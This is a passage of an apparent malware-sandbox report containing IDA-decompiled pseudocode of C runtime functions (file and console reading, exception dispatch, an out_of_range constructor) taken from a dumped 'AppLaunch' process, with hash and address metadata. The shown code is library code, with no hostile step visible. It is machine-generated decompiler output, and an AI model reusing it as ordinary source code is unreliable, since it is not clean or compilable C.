								 *(E00429356(__eflags)) =  *_t149 & _t240;
								 *((intOrPtr*)(E00429369(__eflags))) = 0x16;
								E0042928F();
								goto L39;
							} else {
								_t154 = 4;
								_t212 = _t210 >> 1;
								_v16 = _t154;
								__eflags = _t212 - _t154;
								if(_t212 >= _t154) {
									_t154 = _t212;
									_v16 = _t212;
								}
								_t240 = E00432552(_t154);
								E00432BD6(0);
								E00432BD6(0);
								_t243 = _t242 + 0xc;
								_v24 = _t240;
								__eflags = _t240;
								if(__eflags != 0) {
									_t158 = E0043C4A9(_t198, 0, 0, 1);
									_t242 = _t243 + 0x10;
									_t214 =  *((intOrPtr*)(0x4c7560 + _v12 * 4));
									 *((intOrPtr*)(_t235 + _t214 + 0x20)) = _t158;
									 *(_t235 + _t214 + 0x24) = _t228;
									_t229 = _t240;
									_t210 = _v16;
									_t143 =  *((intOrPtr*)(0x4c7560 + _v12 * 4));
									L22:
									_t199 = _v20;
									_t235 = 0;
									_v40 = _t229;
									__eflags =  *(_t199 + _t143 + 0x28) & 0x00000048;
									_t200 = _a4;
									if(( *(_t199 + _t143 + 0x28) & 0x00000048) != 0) {
										_t57 = _t143 + 0x2a; // 0x10c483c2
										_t180 =  *((intOrPtr*)(_v20 + _t57));
										_t200 = _a4;
										__eflags = _t180 - 0xa;
										if(_t180 != 0xa) {
											__eflags = _t210;
											if(_t210 != 0) {
												_t235 = 1;
												 *_t229 = _t180;
												_t231 = _t229 + 1;
												_t220 = _t210 - 1;
												__eflags = _v5;
												_v24 = _t231;
												_v16 = _t220;
												 *((char*)(_v20 +  *((intOrPtr*)(0x4c7560 + _v12 * 4)) + 0x2a)) = 0xa;
												_t200 = _a4;
												if(_v5 != 0) {
													_t74 =  *((intOrPtr*)(0x4c7560 + _v12 * 4)) + 0x2b; // 0x8310c483
													_t185 =  *((intOrPtr*)(_v20 + _t74));
													_t200 = _a4;
													__eflags = _t185 - 0xa;
													if(_t185 != 0xa) {
														__eflags = _t220;
														if(_t220 != 0) {
															 *_t231 = _t185;
															_t232 = _t231 + 1;
															_t221 = _t220 - 1;
															__eflags = _v5 - 1;
															_v24 = _t232;
															_t235 = 2;
															_v16 = _t221;
															 *((char*)(_v20 +  *((intOrPtr*)(0x4c7560 + _v12 * 4)) + 0x2b)) = 0xa;
															_t200 = _a4;
															if(_v5 == 1) {
																_t91 =  *((intOrPtr*)(0x4c7560 + _v12 * 4)) + 0x2c; // 0xf88310c4
																_t190 =  *((intOrPtr*)(_v20 + _t91));
																_t200 = _a4;
																__eflags = _t190 - 0xa;
																if(_t190 != 0xa) {
																	__eflags = _t221;
																	if(_t221 != 0) {
																		 *_t232 = _t190;
																		_t222 = _t221 - 1;
																		__eflags = _t222;
																		_v16 = _t222;
																		_v24 = _t232 + 1;
																		_t235 = 3;
																		 *((char*)(_v20 +  *((intOrPtr*)(0x4c7560 + _v12 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t160 = E0043B819(_t200);
									__eflags = _t160;
									if(_t160 == 0) {
										L42:
										_v36 = 0;
										L43:
										_t163 = ReadFile(_v28, _v24, _v16,  &_v32, 0);
										__eflags = _t163;
										if(_t163 == 0) {
											L54:
											_t164 = GetLastError();
											_t235 = 5;
											__eflags = _t164 - _t235;
											if(__eflags != 0) {
												__eflags = _t164 - 0x6d;
												if(_t164 != 0x6d) {
													L38:
													E00429333(_t164);
													goto L39;
												}
												_t236 = 0;
												goto L40;
											}
											 *((intOrPtr*)(E00429369(__eflags))) = 9;
											 *(E00429356(__eflags)) = _t235;
											goto L39;
										}
										_t217 = _a12;
										__eflags = _v32 - _t217;
										if(_v32 > _t217) {
											goto L54;
										}
										_t236 = _t235 + _v32;
										__eflags = _t236;
										L46:
										_t230 = _v20;
										_t169 =  *((intOrPtr*)(0x4c7560 + _v12 * 4));
										__eflags =  *((char*)(_t230 + _t169 + 0x28));
										if( *((char*)(_t230 + _t169 + 0x28)) < 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v36;
												_push(_t236 >> 1);
												_push(_v40);
												_push(_t200);
												if(_v36 == 0) {
													_t170 = E0043C64A();
												} else {
													_t170 = E0043C950();
												}
											} else {
												_t218 = _t217 >> 1;
												__eflags = _t217 >> 1;
												_t170 = E0043C7F9(_t217 >> 1, _t217 >> 1, _t200, _v24, _t236, _a8, _t218);
											}
											_t236 = _t170;
										}
										goto L40;
									}
									_t219 = _v20;
									_t172 =  *((intOrPtr*)(0x4c7560 + _v12 * 4));
									__eflags =  *((char*)(_t219 + _t172 + 0x28));
									if( *((char*)(_t219 + _t172 + 0x28)) >= 0) {
										goto L42;
									}
									_t174 = GetConsoleMode(_v28,  &_v44);
									__eflags = _t174;
									if(_t174 == 0) {
										goto L42;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L43;
									}
									_t178 = ReadConsoleW(_v28, _v24, _v16 >> 1,  &_v32, 0);
									__eflags = _t178;
									if(_t178 != 0) {
										_t217 = _a12;
										_t236 = _t235 + _v32 * 2;
										goto L46;
									}
									_t164 = GetLastError();
									goto L38;
								} else {
									 *((intOrPtr*)(E00429369(__eflags))) = 0xc;
									 *(E00429356(__eflags)) = 8;
									L39:
									_t236 = _t235 | 0xffffffff;
									__eflags = _t236;
									L40:
									E00432BD6(_t240);
									return _t236;
								}
							}
						}
						__eflags = _t228 == 1;
						if(_t228 == 1) {
							__eflags =  !_t210 & 0x00000001;
							if(__eflags != 0) {
								_t229 = _a8;
								_v16 = _t210;
								_v24 = _t229;
								_t143 =  *((intOrPtr*)(0x4c7560 + _v12 * 4));
								goto L22;
							}
							goto L14;
						} else {
							_t229 = _a8;
							_v16 = _t210;
							_v24 = _t229;
							goto L22;
						}
					}
					L6:
					 *(E00429356(__eflags)) =  *_t145 & 0x00000000;
					 *((intOrPtr*)(E00429369(__eflags))) = 0x16;
					goto L60;
				} else {
					 *(E00429356(_t246)) =  *_t197 & 0x00000000;
					_t139 = E00429369(_t246);
					 *_t139 = 9;
					L61:
					return _t139 | 0xffffffff;
				}
			}

0x0043c9d4
0x0043c9d8
0x0043c9db
0x0043c9f5
0x0043c9f7
0x0043cd5c
0x0043cd5c
0x0043cd61
0x0043cd61
0x0043cd69
0x0043cd6f
0x0043cd6f
0x00000000
0x0043cd6f
0x0043c9fd
0x0043ca03
0x00000000
0x00000000
0x0043ca0d
0x0043ca13
0x0043ca16
0x0043ca19
0x0043ca23
0x0043ca26
0x0043ca29
0x0043ca2d
0x0043ca2f
0x00000000
0x00000000
0x0043ca35
0x0043ca38
0x0043ca3e
0x0043ca58
0x0043ca5a
0x0043cd58
0x00000000
0x0043cd58
0x0043ca60
0x0043ca63
0x00000000
0x00000000
0x0043ca69
0x0043ca6d
0x00000000
0x00000000
0x0043ca73
0x0043ca76
0x0043ca7a
0x0043ca81
0x0043ca83
0x0043ca83
0x0043ca86
0x0043cadb
0x0043cadd
0x0043caa3
0x0043caa8
0x0043caaf
0x0043cab5
0x00000000
0x0043cadf
0x0043cae1
0x0043cae2
0x0043cae4
0x0043cae7
0x0043cae9
0x0043caeb
0x0043caed
0x0043caed
0x0043caf8
0x0043cafa
0x0043cb01
0x0043cb06
0x0043cb09
0x0043cb0c
0x0043cb0e
0x0043cb32
0x0043cb3a
0x0043cb3d
0x0043cb44
0x0043cb4b
0x0043cb4f
0x0043cb51
0x0043cb54
0x0043cb5b
0x0043cb5b
0x0043cb5e
0x0043cb60
0x0043cb63
0x0043cb68
0x0043cb6b
0x0043cb74
0x0043cb74
0x0043cb78
0x0043cb7b
0x0043cb7d
0x0043cb83
0x0043cb85
0x0043cb8e
0x0043cb8f
0x0043cb91
0x0043cb95
0x0043cb96
0x0043cb9a
0x0043cb9d
0x0043cba7
0x0043cbac
0x0043cbaf
0x0043cbbe
0x0043cbbe
0x0043cbc2
0x0043cbc5
0x0043cbc7
0x0043cbc9
0x0043cbcb
0x0043cbd0
0x0043cbd2
0x0043cbd6
0x0043cbd7
0x0043cbdd
0x0043cbe7
0x0043cbe8
0x0043cbeb
0x0043cbf0
0x0043cbf3
0x0043cc02
0x0043cc02
0x0043cc06
0x0043cc09
0x0043cc0b
0x0043cc0d
0x0043cc0f
0x0043cc11
0x0043cc17
0x0043cc17
0x0043cc18
0x0043cc27
0x0043cc2a
0x0043cc2b
0x0043cc2b
0x0043cc0f
0x0043cc0b
0x0043cbf3
0x0043cbcb
0x0043cbc7
0x0043cbaf
0x0043cb85
0x0043cb7d
0x0043cc31
0x0043cc37
0x0043cc39
0x0043ccac
0x0043ccac
0x0043ccb0
0x0043ccc0
0x0043ccc6
0x0043ccc8
0x0043cd24
0x0043cd24
0x0043cd2c
0x0043cd2d
0x0043cd2f
0x0043cd48
0x0043cd4b
0x0043cc88
0x0043cc89
0x00000000
0x0043cc8e
0x0043cd51
0x00000000
0x0043cd51
0x0043cd36
0x0043cd41
0x00000000
0x0043cd41
0x0043ccca
0x0043cccd
0x0043ccd0
0x00000000
0x00000000
0x0043ccd2
0x0043ccd2
0x0043ccd5
0x0043ccd8
0x0043ccdb
0x0043cce2
0x0043cce7
0x0043cce9
0x0043cced
0x0043cd08
0x0043cd0c
0x0043cd0d
0x0043cd10
0x0043cd11
0x0043cd1d
0x0043cd13
0x0043cd13
0x0043cd13
0x0043ccef
0x0043ccef
0x0043ccef
0x0043ccfa
0x0043ccff
0x0043cd02
0x0043cd02
0x00000000
0x0043cce7
0x0043cc3e
0x0043cc41
0x0043cc48
0x0043cc4d
0x00000000
0x00000000
0x0043cc56
0x0043cc5c
0x0043cc5e
0x00000000
0x00000000
0x0043cc60
0x0043cc64
0x00000000
0x00000000
0x0043cc78
0x0043cc7e
0x0043cc80
0x0043cca4
0x0043cca7
0x00000000
0x0043cca7
0x0043cc82
0x00000000
0x0043cb10
0x0043cb15
0x0043cb20
0x0043cc8f
0x0043cc8f
0x0043cc8f
0x0043cc92
0x0043cc93
0x00000000
0x0043cc9b
0x0043cb0e
0x0043cadd
0x0043ca88
0x0043ca8b
0x0043ca9f
0x0043caa1
0x0043cac2
0x0043cac5
0x0043cac8
0x0043cacb
0x00000000
0x0043cacb
0x00000000
0x0043ca8d
0x0043ca8d
0x0043ca90
0x0043ca93
0x00000000
0x0043ca93
0x0043ca8b
0x0043ca40
0x0043ca45
0x0043ca4d
0x00000000
0x0043c9dd
0x0043c9e2
0x0043c9e5
0x0043c9ea
0x0043cd74
0x00000000
0x0043cd74

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 268d938cff2e312cdf2a5bdb222e0d1886345508965d7c6cf321c2295fb66744
Instruction ID: 38cac6f8da5ef82a40f160810d20a73dad0e600f58aa0c5981ae1c42abde0cdd
Opcode Fuzzy Hash: 268d938cff2e312cdf2a5bdb222e0d1886345508965d7c6cf321c2295fb66744
Instruction Fuzzy Hash: F3C1F371A04209AFDB15DF99E8C0BAEBBB0BF4D304F14506AE905A7392C7389D41CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00427A20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00427A20(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _t52;
				signed int _t59;
				intOrPtr _t60;
				void* _t61;
				intOrPtr* _t62;
				intOrPtr _t64;
				intOrPtr _t67;
				intOrPtr _t72;
				intOrPtr* _t76;
				intOrPtr _t77;
				signed int _t81;
				char _t83;
				intOrPtr _t86;
				intOrPtr _t93;
				intOrPtr _t96;
				intOrPtr* _t98;
				void* _t102;
				void* _t104;
				void* _t111;

				_t89 = __edx;
				_t76 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t76 = E0043F260(__ecx,  *_t76);
				_t77 = _a8;
				_t6 = _t77 + 0x10; // 0x11
				_t96 = _t6;
				_push(_t96);
				_v20 = _t96;
				_v12 =  *(_t77 + 8) ^  *0x4c61a4;
				E004279E0(_t77, __edx, __edi, _t96,  *(_t77 + 8) ^  *0x4c61a4);
				E00428C3C(_a12);
				_t52 = _a4;
				_t104 = _t102 - 0x1c + 0x10;
				_t93 =  *((intOrPtr*)(_t77 + 0xc));
				if(( *(_t52 + 4) & 0x00000066) != 0) {
					__eflags = _t93 - 0xfffffffe;
					if(_t93 != 0xfffffffe) {
						_t89 = 0xfffffffe;
						E00428DC0(_t77, 0xfffffffe, _t96, 0x4c61a4);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t52;
					_v28 = _a12;
					 *((intOrPtr*)(_t77 - 4)) =  &_v32;
					if(_t93 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t81 = _v12;
							_t59 = _t93 + (_t93 + 2) * 2;
							_t77 =  *((intOrPtr*)(_t81 + _t59 * 4));
							_t60 = _t81 + _t59 * 4;
							_t82 =  *((intOrPtr*)(_t60 + 4));
							_v24 = _t60;
							if( *((intOrPtr*)(_t60 + 4)) == 0) {
								_t83 = _v5;
								goto L7;
							} else {
								_t89 = _t96;
								_t61 = E00428D60(_t82, _t96);
								_t83 = 1;
								_v5 = 1;
								_t111 = _t61;
								if(_t111 < 0) {
									_v16 = 0;
									L13:
									_push(_t96);
									E004279E0(_t77, _t89, _t93, _t96, _v12);
									goto L14;
								} else {
									if(_t111 > 0) {
										_t62 = _a4;
										__eflags =  *_t62 - 0xe06d7363;
										if( *_t62 == 0xe06d7363) {
											__eflags =  *0x442ed4;
											if(__eflags != 0) {
												_t72 = E0043ECD0(__eflags, 0x442ed4);
												_t104 = _t104 + 4;
												__eflags = _t72;
												if(_t72 != 0) {
													_t98 =  *0x442ed4; // 0x427bf0
													 *0x440158(_a4, 1);
													 *_t98();
													_t96 = _v20;
													_t104 = _t104 + 8;
												}
												_t62 = _a4;
											}
										}
										_t90 = _t62;
										E00428DA0(_t62, _a8, _t62);
										_t64 = _a8;
										__eflags =  *((intOrPtr*)(_t64 + 0xc)) - _t93;
										if( *((intOrPtr*)(_t64 + 0xc)) != _t93) {
											_t90 = _t93;
											E00428DC0(_t64, _t93, _t96, 0x4c61a4);
											_t64 = _a8;
										}
										_push(_t96);
										 *((intOrPtr*)(_t64 + 0xc)) = _t77;
										E004279E0(_t77, _t90, _t93, _t96, _v12);
										_t86 =  *((intOrPtr*)(_v24 + 8));
										E00428D80();
										asm("int3");
										__eflags = E00428DD7();
										if(__eflags != 0) {
											_t67 = E00427E65(_t86, __eflags);
											__eflags = _t67;
											if(_t67 != 0) {
												return 1;
											} else {
												E00428E13();
												goto L24;
											}
										} else {
											L24:
											__eflags = 0;
											return 0;
										}
									} else {
										goto L7;
									}
								}
							}
							goto L28;
							L7:
							_t93 = _t77;
						} while (_t77 != 0xfffffffe);
						if(_t83 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L28:
			}

0x00427a20
0x00427a27
0x00427a2b
0x00427a2c
0x00427a32
0x00427a3e
0x00427a40
0x00427a46
0x00427a46
0x00427a4f
0x00427a51
0x00427a54
0x00427a57
0x00427a5f
0x00427a64
0x00427a67
0x00427a6a
0x00427a71
0x00427acd
0x00427ad0
0x00427ad8
0x00427adf
0x00000000
0x00427adf
0x00000000
0x00427a73
0x00427a73
0x00427a79
0x00427a7f
0x00427a85
0x00427af0
0x00427af9
0x00427a87
0x00427a87
0x00427a87
0x00427a8d
0x00427a90
0x00427a93
0x00427a96
0x00427a99
0x00427a9e
0x00427ab4
0x00000000
0x00427aa0
0x00427aa0
0x00427aa2
0x00427aa7
0x00427aa9
0x00427aac
0x00427aae
0x00427ac4
0x00427ae4
0x00427ae4
0x00427ae8
0x00000000
0x00427ab0
0x00427ab0
0x00427afa
0x00427afd
0x00427b03
0x00427b05
0x00427b0c
0x00427b13
0x00427b18
0x00427b1b
0x00427b1d
0x00427b1f
0x00427b2c
0x00427b32
0x00427b34
0x00427b37
0x00427b37
0x00427b3a
0x00427b3a
0x00427b0c
0x00427b40
0x00427b42
0x00427b47
0x00427b4a
0x00427b4d
0x00427b55
0x00427b59
0x00427b5e
0x00427b5e
0x00427b61
0x00427b65
0x00427b68
0x00427b75
0x00427b78
0x00427b7d
0x00427b83
0x00427b85
0x00427b8a
0x00427b8f
0x00427b91
0x00427b9c
0x00427b93
0x00427b93
0x00000000
0x00427b93
0x00427b87
0x00427b87
0x00427b87
0x00427b89
0x00427b89
0x00427ab2
0x00000000
0x00427ab2
0x00427ab0
0x00427aae
0x00000000
0x00427ab7
0x00427ab7
0x00427ab9
0x00427ac0
0x00000000
0x00427ac2
0x00000000
0x00427ac0
0x00427a85
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 00427A57
___except_validate_context_record.LIBVCRUNTIME ref: 00427A5F
_ValidateLocalCookies.LIBCMT ref: 00427AE8
__IsNonwritableInCurrentImage.LIBCMT ref: 00427B13
_ValidateLocalCookies.LIBCMT ref: 00427B68

Strings

4RB, xrefs: 00427B2C
csm, xrefs: 00427AFD

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: 4RB$csm
API String ID: 1170836740-51501365
Opcode ID: 05abe68eab1458804291d33e142da80c91305d68c25b3e56f4cb487447d0e811
Instruction ID: 4a15b44bd1444a5c58653728740839df6b533234903ff3c3b410176d134639ef
Opcode Fuzzy Hash: 05abe68eab1458804291d33e142da80c91305d68c25b3e56f4cb487447d0e811
Instruction Fuzzy Hash: ED411934B042289FCF00DF19D841A9FBBB0AF44328F94806BF8045B392C7799E45CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040C390 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C390(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				char _v32;
				char _v56;
				char _v80;
				char _v104;
				char _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				signed int _t25;
				signed int _t65;

				_t25 =  *0x4c61a4; // 0x8656a166
				_v8 = _t25 ^ _t65;
				_v132 = E0040CC10( &_v128);
				E00415310( &_v32, __eflags, "out_of_range");
				_v136 = E00421390(__ebx, __edi, __esi, __eflags,  &_v104,  &_v32, _a8);
				E00406210( &_v56, E004061F0(_v136,  &_v80, _v136, _v132), _a12);
				E00416980( &_v80);
				E00416980( &_v104);
				E00416980( &_v32);
				E00416980( &_v128);
				E004165D0(_a4, _a8, E0041AF80( &_v56));
				E00416980( &_v56);
				return E00424900(_a4, __ebx, _v8 ^ _t65,  &_v80, __edi, __esi, _a16);
			}

0x0040c399
0x0040c3a0
0x0040c3b3
0x0040c3be
0x0040c3d7
0x0040c3fd
0x0040c408
0x0040c410
0x0040c418
0x0040c420
0x0040c435
0x0040c43d
0x0040c452

APIs

Part of subcall function 00421390: task.LIBCPMTD ref: 00421406
Part of subcall function 00421390: task.LIBCPMTD ref: 0042140E
Part of subcall function 00421390: task.LIBCPMTD ref: 00421416
Part of subcall function 00421390: task.LIBCPMTD ref: 0042141E

task.LIBCPMTD ref: 0040C408
task.LIBCPMTD ref: 0040C410
task.LIBCPMTD ref: 0040C418
task.LIBCPMTD ref: 0040C420
Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 0040C435
task.LIBCPMTD ref: 0040C43D

Strings

out_of_range, xrefs: 0040C3B6

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
String ID: out_of_range
API String ID: 2520070614-3053435996
Opcode ID: e676bc7f91cdfb79a0e3ac90ca34a7cbf045baa8b3aaf58ed2b0d57273fe788e
Instruction ID: 2d1d5e85dc61602aba86b90c810d06cefdb8f387863cc7bbd975e19f3316b9e5
Opcode Fuzzy Hash: e676bc7f91cdfb79a0e3ac90ca34a7cbf045baa8b3aaf58ed2b0d57273fe788e
Instruction Fuzzy Hash: 6A2112B1D1010CABCB04EFA5ED92DEEB778AF58304F50412EF519A7142EE34AA54CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0042810A Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 303
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 80%

			E0042810A(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				char _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				intOrPtr* _v112;
				signed char* _v184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t201;
				signed int _t202;
				char _t203;
				signed int _t205;
				signed int _t207;
				signed char* _t208;
				signed int _t209;
				signed int _t210;
				signed int _t214;
				void* _t217;
				signed char* _t220;
				void* _t222;
				void* _t224;
				signed char _t228;
				signed int _t229;
				void* _t231;
				void* _t234;
				void* _t237;
				signed int _t247;
				void* _t250;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr _t253;
				signed int _t254;
				void* _t259;
				void* _t264;
				void* _t265;
				signed int _t269;
				signed char* _t270;
				intOrPtr* _t271;
				signed char _t272;
				signed int _t273;
				signed int _t274;
				intOrPtr* _t276;
				signed int _t277;
				signed int _t278;
				signed int _t283;
				signed int _t290;
				signed int _t291;
				signed int _t294;
				signed int _t296;
				signed char* _t297;
				signed int _t298;
				signed char _t299;
				signed int* _t301;
				signed char* _t304;
				signed int _t314;
				signed int _t315;
				signed int _t317;
				signed int _t327;
				void* _t329;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;

				_t296 = __edx;
				_push(_t315);
				_t301 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t275 = E0042907A(_a8, _a16, _t301);
				_t332 = _t331 + 0xc;
				_v12 = _t275;
				if(_t275 < 0xffffffff || _t275 >= _t301[1]) {
					L67:
					_t201 = E0042972B(_t270, _t275, _t296, _t301, _t315);
					asm("int3");
					_t329 = _t332;
					_t333 = _t332 - 0x38;
					_push(_t270);
					_t271 = _v112;
					__eflags =  *_t271 - 0x80000003;
					if( *_t271 == 0x80000003) {
						return _t201;
					} else {
						_push(_t315);
						_push(_t301);
						_t202 = E00427DC5(_t271, _t275, _t296, _t301, _t315);
						__eflags =  *(_t202 + 8);
						if( *(_t202 + 8) != 0) {
							__imp__EncodePointer(0);
							_t315 = _t202;
							_t222 = E00427DC5(_t271, _t275, _t296, 0, _t315);
							__eflags =  *((intOrPtr*)(_t222 + 8)) - _t315;
							if( *((intOrPtr*)(_t222 + 8)) != _t315) {
								__eflags =  *_t271 - 0xe0434f4d;
								if( *_t271 != 0xe0434f4d) {
									__eflags =  *_t271 - 0xe0434352;
									if( *_t271 != 0xe0434352) {
										_t214 = E00427645(_t296, 0, _t315, _t271, _a4, _a8, _a12, _a16, _a24, _a28);
										_t333 = _t333 + 0x1c;
										__eflags = _t214;
										if(_t214 != 0) {
											L84:
											return _t214;
										}
									}
								}
							}
						}
						_t203 = _a16;
						_v28 = _t203;
						_v24 = 0;
						__eflags =  *(_t203 + 0xc);
						if( *(_t203 + 0xc) > 0) {
							_push(_a24);
							E00427578(_t271, _t275, 0, _t315,  &_v44,  &_v28, _a20, _a12, _t203);
							_t298 = _v40;
							_t334 = _t333 + 0x18;
							_t214 = _v44;
							_v20 = _t214;
							_v12 = _t298;
							__eflags = _t298 - _v32;
							if(_t298 >= _v32) {
								goto L84;
							}
							_t277 = _t298 * 0x14;
							__eflags = _t277;
							_v16 = _t277;
							do {
								_t278 = 5;
								_t217 = memcpy( &_v64,  *((intOrPtr*)( *_t214 + 0x10)) + _t277, _t278 << 2);
								_t334 = _t334 + 0xc;
								__eflags = _v64 - _t217;
								if(_v64 > _t217) {
									goto L83;
								}
								__eflags = _t217 - _v60;
								if(_t217 > _v60) {
									goto L83;
								}
								_t220 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t283 = _t220[4];
								__eflags = _t283;
								if(_t283 == 0) {
									L81:
									__eflags =  *_t220 & 0x00000040;
									if(( *_t220 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E0042808A(_t298, _t271, _a4, _a8, _a12, _a16, _t220, 0,  &_v64, _a24, _a28);
										_t298 = _v12;
										_t334 = _t334 + 0x30;
									}
									goto L83;
								}
								__eflags =  *((char*)(_t283 + 8));
								if( *((char*)(_t283 + 8)) != 0) {
									goto L83;
								}
								goto L81;
								L83:
								_t298 = _t298 + 1;
								_t214 = _v20;
								_t277 = _v16 + 0x14;
								_v12 = _t298;
								_v16 = _t277;
								__eflags = _t298 - _v32;
							} while (_t298 < _v32);
							goto L84;
						}
						E0042972B(_t271, _t275, _t296, 0, _t315);
						asm("int3");
						_push(_t329);
						_t297 = _v184;
						_push(_t271);
						_push(_t315);
						_push(0);
						_t205 = _t297[4];
						__eflags = _t205;
						if(_t205 == 0) {
							L109:
							_t207 = 1;
							__eflags = 1;
						} else {
							_t276 = _t205 + 8;
							__eflags =  *_t276;
							if( *_t276 == 0) {
								goto L109;
							} else {
								__eflags =  *_t297 & 0x00000080;
								_t304 = _v0;
								if(( *_t297 & 0x00000080) == 0) {
									L91:
									_t272 = _t304[4];
									_t317 = 0;
									__eflags = _t205 - _t272;
									if(_t205 == _t272) {
										L101:
										__eflags =  *_t304 & 0x00000002;
										if(( *_t304 & 0x00000002) == 0) {
											L103:
											_t208 = _a4;
											__eflags =  *_t208 & 0x00000001;
											if(( *_t208 & 0x00000001) == 0) {
												L105:
												__eflags =  *_t208 & 0x00000002;
												if(( *_t208 & 0x00000002) == 0) {
													L107:
													_t317 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t297 & 0x00000002;
													if(( *_t297 & 0x00000002) != 0) {
														goto L107;
													}
												}
											} else {
												__eflags =  *_t297 & 0x00000001;
												if(( *_t297 & 0x00000001) != 0) {
													goto L105;
												}
											}
										} else {
											__eflags =  *_t297 & 0x00000008;
											if(( *_t297 & 0x00000008) != 0) {
												goto L103;
											}
										}
										_t207 = _t317;
									} else {
										_t184 = _t272 + 8; // 0x6e
										_t209 = _t184;
										while(1) {
											_t273 =  *_t276;
											__eflags = _t273 -  *_t209;
											if(_t273 !=  *_t209) {
												break;
											}
											__eflags = _t273;
											if(_t273 == 0) {
												L97:
												_t210 = _t317;
											} else {
												_t274 =  *((intOrPtr*)(_t276 + 1));
												__eflags = _t274 -  *((intOrPtr*)(_t209 + 1));
												if(_t274 !=  *((intOrPtr*)(_t209 + 1))) {
													break;
												} else {
													_t276 = _t276 + 2;
													_t209 = _t209 + 2;
													__eflags = _t274;
													if(_t274 != 0) {
														continue;
													} else {
														goto L97;
													}
												}
											}
											L99:
											__eflags = _t210;
											if(_t210 == 0) {
												goto L101;
											} else {
												_t207 = 0;
											}
											goto L110;
										}
										asm("sbb eax, eax");
										_t210 = _t209 | 0x00000001;
										__eflags = _t210;
										goto L99;
									}
								} else {
									__eflags =  *_t304 & 0x00000010;
									if(( *_t304 & 0x00000010) != 0) {
										goto L109;
									} else {
										goto L91;
									}
								}
							}
						}
						L110:
						return _t207;
					}
				} else {
					_t270 = _a4;
					if( *_t270 != 0xe06d7363 || _t270[0x10] != 3 || _t270[0x14] != 0x19930520 && _t270[0x14] != 0x19930521 && _t270[0x14] != 0x19930522) {
						L22:
						_t296 = _a12;
						_v8 = _t296;
						goto L24;
					} else {
						_t315 = 0;
						if(_t270[0x1c] != 0) {
							goto L22;
						} else {
